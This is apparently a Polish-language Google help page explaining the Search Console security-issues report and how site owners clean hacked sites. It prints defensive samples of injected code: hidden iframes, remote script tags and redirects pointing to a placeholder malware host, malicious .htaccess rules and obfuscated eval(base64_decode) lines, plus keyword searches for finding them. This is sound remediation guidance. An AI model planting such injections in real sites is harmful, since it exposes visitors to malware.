Raport „Problemy dotyczące bezpieczeństwa”

Jeśli stwierdzimy, że Twoją witrynę zaatakowali hakerzy lub doszło w niej do działania, które może być szkodliwe dla użytkowników bądź ich komputerów, umieścimy informacje na ten temat w raporcie Google „Problemy dotyczące bezpieczeństwa”. Przykłady szkodliwych działań to między innymi ataki mające na celu wyłudzenie informacji lub zainstalowanie na komputerach użytkowników złośliwego bądź niechcianego oprogramowania.

Strony lub witryny, w przypadku których występuje problem z bezpieczeństwem, mogą wyświetlać się w wynikach wyszukiwania z etykietą ostrzegawczą lub podczas próby wejścia na taką stronę w przeglądarce może pojawiać się pełnoekranowe ostrzeżenie.

Otwórz raport „Problemy dotyczące bezpieczeństwa”

 

Co to są problemy dotyczące bezpieczeństwa?

Problemy dotyczące bezpieczeństwa można podzielić na te kategorie:

  • Treści zmodyfikowane przez hakerów: to wszelkie treści umieszczone w Twojej witrynie bez Twojego zezwolenia poprzez wykorzystanie luk w zabezpieczeniach. Aby chronić naszych użytkowników, staramy się, by takie treści nie trafiały do naszego indeksu. Więcej informacji
  • Złośliwe i niechciane oprogramowanie: to oprogramowanie, którego celem jest wyrządzanie szkód na urządzeniach lub szkodzenie użytkownikom. Wykonuje ono działania wprowadzające w błąd, niezamierzone lub obniżające komfort korzystania z urządzenia. Więcej informacji
  • Inżynieria społeczna: to treści, które podstępem nakłaniają użytkowników do zrobienia czegoś niebezpiecznego, na przykład do ujawnienia poufnych informacji lub pobrania oprogramowania. Więcej informacji

Czy w mojej witrynie występują problemy z bezpieczeństwem?

Jeśli takie problemy występują, zobaczysz ich liczbę w górnej części raportu.

Jeśli takich problemów nie ma, zobaczysz zielony znacznik i odpowiedni komunikat.

Jestem właścicielem tej witryny dopiero od niedawna

Jeśli w niedawno kupionej przez Ciebie witrynie wcześniej istniały problemy dotyczące bezpieczeństwa, rozwiąż problemy wymienione w raporcie i wyślij prośbę o ponowne rozpatrzenie zgłoszenia, by powiadomić nas, że witryna zmieniła właściciela i jest już zgodna ze wskazówkami Google dla webmasterów.

Których stron dotyczy problem?

Rozwiń opis problemu, by zobaczyć listę przykładowych adresów URL, których dotyczy problem. Lista nie musi być pełna i może zawierać tylko przykładowe strony w Twojej witrynie, na których występuje wybrany problem. Może się zdarzyć, że w przypadku określonego problemu z bezpieczeństwem nie będzie żadnych przykładowych adresów URL. Nie oznacza to, że problem nie dotyczy żadnej strony. Widocznie z jakichś powodów nie możemy wygenerować przykładów.

Szczegółowe informacje o problemie obejmują dzień, w którym został on wykryty po raz pierwszy w witrynie, a także krótki opis i link prowadzący do dalszych informacji.

Rozwiązywanie problemu

Aby rozwiązać problem z bezpieczeństwem w witrynie:

  1. Rozwiń opis problemu w raporcie „Problemy dotyczące bezpieczeństwa”.
  2. Przeczytaj opis problemu, a następnie kliknij link „Więcej informacji”, by uzyskać szczegółowe informacje i dowiedzieć się, jakie czynności należy wykonać, by ten problem rozwiązać. (Linki prowadzące do dalszych informacji kierują do opisów w dolnej części tej strony).
  3. Wykorzystaj przykłady stron podane w sekcji szczegółów, by rozwiązać problem. Lista nie musi być pełna i może zawierać tylko przykładowe strony w Twojej witrynie, na których występuje ten problem. Może się zdarzyć, że w przypadku określonego problemu z bezpieczeństwem nie będzie żadnych przykładowych adresów URL. Nie oznacza to, że problem nie dotyczy żadnej strony. Widocznie z jakichś powodów nie możemy wygenerować przykładów.
  4. Rozwiąż problem w całej witrynie. Rozwiązanie problemu tylko na niektórych stronach nie spowoduje, że Twoja witryna będzie częściowo uwzględniana w wynikach wyszukiwania.
  5. Jeśli w raporcie wymieniono wiele problemów dotyczących bezpieczeństwa w Twojej witrynie, musisz rozwiązać je wszystkie.
  6. Przetestuj poprawki.
  7. Gdy na wszystkich stronach rozwiążesz wszystkie problemy wymienione w raporcie, kliknij w nim Poproś o sprawdzenie. W prośbie o ponowne rozpatrzenie zgłoszenia opisz wprowadzone poprawki. Dobra prośba spełnia trzy warunki:
    • Dokładnie omawia problem związany z jakością Twojej witryny.
    • Opisuje działania podjęte w celu usunięcia problemu.
    • Dokumentuje wyniki tych działań.
  8. Rozpatrzenie prośby o ponowne sprawdzenie może potrwać tydzień lub dwa. Poinformujemy Cię o postępach e-mailem. Po wysłaniu prośby otrzymasz potwierdzenie z informacją, że weryfikacja jest w toku. Nie wysyłaj prośby ponownie, dopóki nie dostaniesz ostatecznej decyzji dotyczącej rozpatrywanej prośby.

Jak długo potrwa rozpatrzenie prośby?

Do tygodnia lub dwóch. Po otrzymaniu prośby wyślemy e-maila z odpowiednią informacją, więc będziesz wiedzieć, że ją rozpatrujemy. Po zakończeniu weryfikacji również otrzymasz od nas powiadomienie e-mailem.

Nie wysyłaj prośby ponownie, dopóki nie dostaniesz ostatecznej decyzji dotyczącej wszelkich rozpatrywanych próśb. Jeśli przed przesłaniem prośby nie usuniesz problemu, czas rozpatrzenia następnej prośby może ulec wydłużeniu, a Ty możesz nawet uzyskać status wielokrotnego sprawcy.

Lista problemów dotyczących bezpieczeństwa

Oto lista potencjalnych problemów dotyczących bezpieczeństwa wraz z informacjami, jak je naprawić. Problemy są klasyfikowane jako błędy  lub ostrzeżenia .

Strony wprowadzające w błąd

Twoja witryna zawiera treści, które podstępem nakłaniają użytkowników do zrobienia czegoś niebezpiecznego, na przykład do ujawnienia poufnych informacji lub pobrania oprogramowania. Bezpieczne przeglądanie Google chroni internautów przed wchodzeniem na strony, które systematycznie wyświetlają treści wprowadzające w błąd.

Stronę internetową uważa się za wprowadzającą w błąd, jeśli:

  • naśladuje ona wygląd i styl typowe dla zaufanego podmiotu, na przykład upodabnia się w działaniu do urządzenia bądź przeglądarki użytkownika albo samej „bezpiecznej” witryny; lub
  • stara się podstępem nakłonić użytkownika do zrobienia czegoś, co zrobiłby tylko w przypadku zaufanego podmiotu – na przykład do udostępnienia hasła, skontaktowania się z działem pomocy technicznej lub pobrania oprogramowania.

Stosowanie tego typu treści wprowadzających w błąd jest określane mianem inżynierii społecznejDowiedz się więcej o inżynierii społecznej lub zobacz przykłady stron wprowadzających w błąd.

Rozwiąż problem

1. Potwierdź problem

Otwórz przykładowe strony, by poszukać treści wprowadzających w błąd. Możesz skorzystać z narzędzia do sprawdzania adresów URL, by zobaczyć witrynę zarówno w wersji na komputery, jak i urządzenia mobilne.

2. Napraw błędy na stronach

Napraw błędy na wszystkich stronach, które stosują inżynierię społeczną. Jeśli uważasz, że Bezpieczne przeglądanie błędnie sklasyfikowało stronę internetową, zgłoś to tutaj.

3. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Umieszczone zasoby wprowadzające w błąd

Twoja witryna zawiera wprowadzające w błąd reklamy lub umieszczone zasoby, które nakłaniają użytkowników do zrobienia czegoś niebezpiecznego, np. do ujawnienia poufnych informacji lub pobrania niechcianego oprogramowania. Fałszywe treści mogą pojawić się na stronie jako umieszczone na niej zasoby, takie jak obrazy, komponenty firm zewnętrznych lub reklamy. Bezpieczne przeglądanie Google chroni internautów przed wchodzeniem na strony, które systematycznie wyświetlają treści wprowadzające w błąd.

Czasami treści te są widoczne na stronie hosta. W innych przypadkach witryna hosta nie zawiera żadnych widocznych reklam, lecz kieruje użytkowników na nieprawidłowe strony za pomocą wyskakujących okienek, reklam pop-under lub innych typów przekierowań. We wszystkich przypadkach umieszczanie treści tego typu stanowi naruszenie zasad strony hosta.

Stosowanie tego typu treści wprowadzających w błąd jest określane mianem inżynierii społecznejDowiedz się więcej o inżynierii społecznej lub zobacz przykłady umieszczonych zasobów wprowadzających w błąd.

Rozwiąż problem

1. Potwierdź problem

Otwórz przykładowe strony, by poszukać treści wprowadzających w błąd. Upewnij się, że żadne reklamy, obrazy ani inne zasoby firm zewnętrznych umieszczone na stronach witryny nie wprowadzają użytkowników w błąd. Pamiętaj, że sieci reklamowe mogą stosować rotację reklam wyświetlanych w witrynie. Dlatego musisz kilkakrotnie odświeżyć stronę, by sprawdzić, czy nie pojawią się reklamy stosujące technik inżynierii społecznej. Niektóre reklamy mogą wyglądać na urządzeniach mobilnych inaczej niż na komputerach. Możesz skorzystać z narzędzia do sprawdzania adresów URL, by zobaczyć witrynę zarówno w wersji na komputery, jak i na urządzenia mobilne.

2. Usuń reklamy lub zasoby wprowadzające w błąd

Sprawdź zasoby firm zewnętrznych umieszczone w Twojej witrynie. Upewnij się, że żadne reklamy, obrazy ani inne zasoby firm zewnętrznych umieszczone na stronach witryny nie wprowadzają użytkowników w błąd. Napraw błędy na wszystkich stronach, które stosują inżynierię społeczną.

3. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Złośliwe oprogramowanie
Haker zainfekował Twoją witrynę lub umieścił w niej złośliwe oprogramowanie. Termin „złośliwe oprogramowanie” odnosi się do oprogramowania lub aplikacji mobilnych zaprojektowanych specjalnie w celu zaszkodzenia użytkownikom lub uszkodzenia komputera, urządzenia mobilnego bądź zainstalowanych na nim aplikacji.

1. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Rozwiązanie problemu ze złośliwym oprogramowaniem wymaga umiejętności odczytania i zrozumienia kodu, a czasem też znajomości konfiguracji serwerów WWW obsługujących witrynę. Jeśli nie czujesz się zbyt pewnie, przeczytaj artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, jak znaleźć wsparcie.

2. Zdiagnozuj i rozwiąż problem ze złośliwym oprogramowaniem

Jest wiele rodzajów złośliwego oprogramowania. Przeczytaj sekcje poniżej, by podjąć próbę zdiagnozowania i usunięcia złośliwego oprogramowania określonego typu. Pamiętaj, że Twoja witryna mogła zostać zainfekowana kilkoma rodzajami złośliwego oprogramowania. Uważnie zdiagnozuj problem i oczyść witrynę.

Typ złośliwego oprogramowania: konfiguracja serwera

Opis

Haker przejął witrynę i przekierowuje jej użytkowników do swojej witryny ze złośliwym oprogramowaniem, prawdopodobnie dzięki modyfikacji plików konfiguracyjnych serwera. Zwykle pozwalają one administratorowi witryny określić przekierowania URL z konkretnych stron lub katalogów witryny. Na przykład na serwerach Apache te pliki to .htaccess i httpd.conf.

Rozwiąż problem

1. Potwierdź problem

Odwiedź przykładowe adresy URL wymienione w raporcie „Problemy dotyczące bezpieczeństwa”.

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Odpowiedź ze strony zainfekowanej złośliwym oprogramowaniem typu „konfiguracja serwera” może zawierać te nagłówki:

< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<witryna-ze-złośliwym-oprogramowaniem>/index.html
< Content-Length: 253
...

2. Usuń z witryny złośliwe oprogramowanie typu „konfiguracja serwera”

Zaloguj się na serwer, korzystając z powłoki lub terminala (witryna może być offline), i przejrzyj odpowiednie pliki konfiguracyjne serwera. Takich zmodyfikowanych plików może być więcej. Poszukaj w nich niepożądanych dyrektyw – takich jak przekierowania, które powodują, że użytkownicy z Twojej witryny trafiają do nieznanych witryn ze złośliwym oprogramowaniem. Na przykład w pliku .htaccess przekierowanie może wyglądać tak:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<witryna-ze-złośliwym-oprogramowaniem>/index.html [R=301]

 

Dodatkowo:

  • Pamiętaj, by sprawdzić cały plik, na wypadek gdyby haker dodał kod na końcu, gdzie łatwiej go przeoczyć.
  • Zbadaj, czy haker nie utworzył zadań cron, które stale aktualizują plik .htaccess. Ich lista może być w kilku lokalizacjach takich jak /etc/crontab (i wiele katalogów /etc/cron*) czy /var/spool/cron.
  • Przeczytaj przewodnik dla właścicieli witryn zaatakowanych przez hakerów, by poznać pełną procedurę rozwiązywania problemu, między innymi opis czyszczenia witryny, oraz wskazówki, jak ją ochronić przed ponownym atakiem.
Typ złośliwego oprogramowania: wstrzyknięty SQL

Opis

Prawdopodobnie haker zaatakował bazę danych Twojej witryny. Na przykład haker mógł programowo wstawić złośliwy kod do każdego rekordu tabeli bazy danych. Gdy serwer wczytuje stronę wymagającą informacji z bazy danych, złośliwy kod jest umieszczany w treści tej strony i może wyrządzić szkody na komputerze użytkownika witryny.

Rozwiąż problem

1. Potwierdź problem

Wyślij z wiersza poleceń kilka zapytań dotyczących problematycznych adresów URL i poszukaj w odpowiedzi słów SQL związanych z atakiem, np. „iframe” czy „eval”.

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Następnie zaloguj się na serwer bazy danych lub wyświetl ją w takim narzędziu jak phpMyAdmin. Jeśli używasz Wget lub cURL, spróbuj dopasować szkody znalezione w pobranym tymi narzędziami kodzie źródłowym strony do istniejących wpisów w bazie danych. Gdy np. zauważysz, że strony zawierają niebezpieczny element iframe, użyj zapytania SQL, które wyszukuje kod tego elementu. Na przykład:

SELECT * FROM posty_na_blogu WHERE tekst_posta LIKE '%>iframe%';

Warto też w dzienniku i plikach błędów bazy danych na serwerze poszukać śladów nietypowej aktywności – takich jak nieoczekiwane polecenia SQL, które nie pasują do zwykłych błędów czy działań użytkowników.

2. Wyczyść witrynę

Gdy przygotujesz się już do czyszczenia witryny, możesz zaktualizować każdy zainfekowany rekord bazy danych albo przywrócić jej ostatnią nienaruszoną kopię zapasową.

Dodatkowo:

Typ złośliwego oprogramowania: wstrzyknięty kod

Opis

Do stron w witrynie został dodany złośliwy kod, na przykład element iframe z witryny rozpowszechniającej złośliwe oprogramowanie.

Rozwiąż problem

1. Potwierdź problem

Odwiedź strony wymienione na liście zainfekowanych adresów URL w raporcie „Problemy dotyczące bezpieczeństwa”. Poszukaj złośliwego kodu w kodzie HTML odpowiedzi.

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Oto kilka przykładów złośliwego kodu:

  • Element iframe, który ładuje złośliwą witrynę:
    <iframe frameborder="0" height="0" src="http://<witryna-ze-złośliwym-oprogramowaniem>/path/file" 
      style="display:none" width="0"></iframe>
  • Instrukcja w JavaScripcie lub innym języku skryptowym, która wywołuje i uruchamia skrypty ze złośliwej witryny:
    <script type='text/javascript' src='http://<witryna-ze-złośliwym-oprogramowaniem>/js/x55.js'></script>
  • Skrypt, który przekierowuje przeglądarkę do złośliwej witryny:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<witryna-ze-złośliwym-oprogramowaniem>/");
      }
    </script>
  • Złośliwy kod, który jest zamaskowany, by uniknąć wykrycia:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Pliki udostępnionych obiektów, które losowo zapisują szkodliwy kod w normalnie bezpiecznych skryptach:
    #httpd.conf zmieniony przez hackera
    LoadModule szkodliwy_moduł modules/mod_szkodliwy.so
    AddModule mod_szkodliwy.c

Zbadaj cały potencjalnie szkodliwy kod, który znajdziesz w witrynie. Aby znaleźć kod elementu iframe, warto wyszukać takie słowa jak „iframe”. Inne przydatne słowa kluczowe to „script”, „eval” i „unescape”. Aby na przykład wyszukać słowo „iframe” we wszystkich plikach w systemie typu Unix:

$grep -irn "iframe" ./ | less

2. Wyczyść witrynę

Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmienione pliki ostatnią nienaruszoną kopią zapasową lub z każdej strony usunąć wstrzyknięty kod oraz wszystkie powiązane funkcje i pliki skryptów. Jeśli poprawisz pliki konfiguracyjne serwera, prawdopodobnie trzeba będzie ponownie go uruchomić, by zmiany zaczęły obowiązywać.

Dodatkowo:

Typ złośliwego oprogramowania: szablon błędu

Opis

Szablon komunikatu o błędzie, taki jak „404 Nie znaleziono pliku”, został skonfigurowany tak, by rozpowszechniał złośliwe oprogramowanie. W ten sposób haker może wykorzystywać w atakach adresy URL, które nawet nie istnieją w Twojej witrynie.

Rozwiąż problem

1. Potwierdź problem

Wyślij żądanie strony, która nie istnieje w Twojej witrynie, lub takiej, która wyświetla inny typ błędu, i sprawdź, czy odpowiedź pochodzi z innej witryny albo zawiera złośliwe oprogramowanie.

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Wyczyść witrynę

Zaloguj się na serwer internetowy i wyszukaj w jego plikach konfiguracyjnych instrukcje dotyczące strony błędu. Na przykład szablon błędu serwera WWW Apache można zadeklarować w pliku .htaccess. Oto przykład wpisu w pliku .htaccess, który pobiera strony błędu 404 ze złośliwej witryny:

ErrorDocument 404 http://<witryna-ze-złośliwym-oprogramowaniem>/index.html 

Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić pliki .htaccess nienaruszoną kopią zapasową lub usunąć niepożądane instrukcje ErrorDocument z istniejących plików .htaccess. Pamiętaj też, by wyczyścić faktyczne pliki błędów, jeśli masz je w swojej witrynie. Na koniec ponownie uruchom serwer WWW, by wszystkie zmiany zaczęły obowiązywać.

Dodatkowo:

Typ złośliwego oprogramowania: złośliwe oprogramowanie w innej witrynie

Opis

Witryna wczytuje treści z innej witryny, która zawiera złośliwe elementy. W Chrome informuje o tym pełnoekranowy komunikat z tą grafiką:

cross-site malware warning

Rozwiąż problem​

  1. Potwierdź problem, przechodząc do kilku przykładowych adresów URL wymienionych w raporcie „Problemy dotyczące bezpieczeństwa”. Jeśli jest to problem związany ze złośliwym oprogramowaniem w innej witrynie, zobaczysz grafikę przedstawioną powyżej.
  2. W ostrzeżeniu wyświetlonym w przeglądarce zobaczysz nazwę domeny, z której pochodzą nieodpowiednie treści. Usuń wszystkie odwołania do oznaczonej witryny wymienione w ostrzeżeniu wyświetlonym w przeglądarce.
  3. Jeśli odkryjesz, że treści z oznaczonej witryny pojawiły się na danej stronie bez Twojej wiedzy, problem jest poważniejszy i Twoja witryna prawdopodobnie została przejęta. W obu przypadkach Google zaleca zastosowanie procesu odzyskiwania opisanego w Pomocy dla właścicieli witryn zaatakowanych przez hakerów, podczas którego poddasz witrynę kwarantannie, ocenisz szkody i ją oczyścisz.
  4. Gdy usuniesz z witryny wszystkie treści używane do inżynierii społecznej, z poziomu raportu „Problemy dotyczące bezpieczeństwa” możesz poprosić o sprawdzenie zabezpieczeń. Może to potrwać od kilku dni do kilku tygodni.
  5. Jeśli celowo dołączysz treści z wiarygodnej witryny, która została oznaczona, i chcesz ponownie je dodać po oczyszczeniu oznaczonej witryny, możesz monitorować stan tej witryny na jej stronie diagnostycznej w Bezpiecznym przeglądaniu Google (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Właściciele wiarygodnych witryn zwykle szybko je czyszczą.
Inne typy złośliwego oprogramowania

Jest wiele innych typów złośliwego oprogramowania, które może mieć wpływ na Twoją witrynę. Na stronie Podstawy tworzenia witryn znajdziesz wskazówki dotyczące diagnozowania innych typów ataków hakerskich oraz usuwania ich skutków. Po usunięciu problemu w witrynie poproś o jej sprawdzenie.

3. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Typ ataku hakera: wstrzyknięty kod

Haker przejął witrynę i wstrzykuje złośliwy kod na Twoich stronach. Przykłady obejmują przekierowania do złośliwej witryny lub uruchamianie w przeglądarce oprogramowania wydobywającego kryptowaluty, gdy strona jest otwarta.

1. Zdecyduj, czy możesz ten problem rozwiązać samodzielnie

Zobacz artykuł Uzyskaj pomoc innych osób, by dowiedzieć się, co trzeba zrobić w celu rozwiązania problemu lub jak znaleźć pomoc, jeśli nie możesz tego zrobić samodzielnie.

2. Potwierdź problem

Unikaj bezpośredniego otwierania zainfekowanych stron witryny w przeglądarce.

Złośliwe oprogramowanie często się rozpowszechnia, wykorzystując luki w zabezpieczeniach przeglądarki, dlatego otwarcie zainfekowanej nim strony może spowodować szkody na Twoim komputerze. Co więcej, hakerzy mogą ukrywać spamerską treść przed właścicielami witryn, używając technik maskowania.

Oto dwie alternatywne metody bezpieczniejszego przeglądania treści na komputerze:

  • Użyj narzędzia do sprawdzania adresów URL, by wyświetlić stronę tak samo, jak widzi ją Google. To bardzo praktyczna metoda, ponieważ hakerzy często wprowadzają zmiany, które są widoczne tylko dla komputerów Google. Na przykład mogą dodać na Twoich stronach linki prowadzące do ich witryny, które są renderowane tylko wtedy, gdy stroną odsyłającą jest Google.
  • Skorzystaj z narzędzi cURL lub Wget, by wysłać żądania HTTP (na przykład służące do wyświetlenia strony) z wiersza poleceń. Te bezpłatne narzędzia pozwalają dołączyć do żądań informacje o stronie odsyłającej i kliencie użytkownika, co ułatwia diagnostykę przekierowań. Hakerzy często atakują tylko określone klienty użytkownika lub strony odsyłające, by uniknąć wykrycia i wybrać lepsze cele. Dzięki tym narzędziom możesz imitować cel. Jeśli Twoje żądanie nie wywoła spamu, spróbuj użyć różnych adresów stron odsyłających (takich jak linki z dużych witryn lub różnych wyszukiwarek). Aby na przykład naśladować takie działanie użytkownika jak kliknięcie w wynikach wyszukiwania Google linku www.example.com/page.html na komputerze z systemem Windows, użyj narzędzia cURL w ten sposób:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Haker mógł wstrzyknąć złośliwy kod prosto do plików HTML witryny (np. przekierowania JavaScript) lub tych stosowanych do generowania treści (np. plików PHP).

Wyślij żądanie wyświetlenia zaatakowanej strony wymienionej w raporcie i sprawdź odpowiedź. Hakerzy mogą wykorzystać kilka różnych technik, by przekierować użytkowników z Twojej witryny do swojej, na przykład:

  • Przekierowanie:​
    • Przekierowania nagłówka: hakerzy mogą przekierowywać użytkowników, modyfikując pliki konfiguracyjne serwera. Zwykle pozwalają one administratorowi witryny określić przekierowania URL z konkretnych stron lub katalogów witryny. Na przykład na serwerach Apache te pliki to .htaccess i httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<witryna-ze-złośliwym-oprogramowaniem>/index.html
      < Content-Length: 253
    • Przekierowania JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<witryna-ze-złośliwym-oprogramowaniem>/");}
      <script>
  • Złośliwy kod JavaScript wczytany z innej witryny:
    <script type='text/javascript' src='http://<witryna-ze-złośliwym-oprogramowaniem>/js/x55.js'></script>
  • Złośliwy kod, który jest zamaskowany, by uniknąć wykrycia:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Poszukaj podejrzanego kodu w odpowiedziach i witrynie. Przydatne hasła to „search”, „eval”, „base64_decode” i „unescape”.

3. Wyczyść witrynę

Gdy przygotujesz się do czyszczenia witryny, możesz zastąpić zmodyfikowane pliki nienaruszoną kopią zapasową lub samodzielnie usunąć treści spamerskie.

Dodatkowo:

4. Poproś o sprawdzenie witryny

Gdy potwierdzisz, że problem w witrynie został rozwiązany, poproś o sprawdzenie zabezpieczeń z poziomu raportu „Problemy dotyczące bezpieczeństwa”. Może to potrwać od kilku dni do kilku tygodni.

Typ ataku hakera: wstrzyknięta zawartość

Haker dodał do stron w witrynie spamerskie linki lub teksty. Wstrzyknięte treści mogą zawierać terminy farmaceutyczne lub inny spam niezwiązany z tematyką witryny.

Hakerzy zwykle wprowadzają zmiany w witrynie na jeden z tych sposobów:

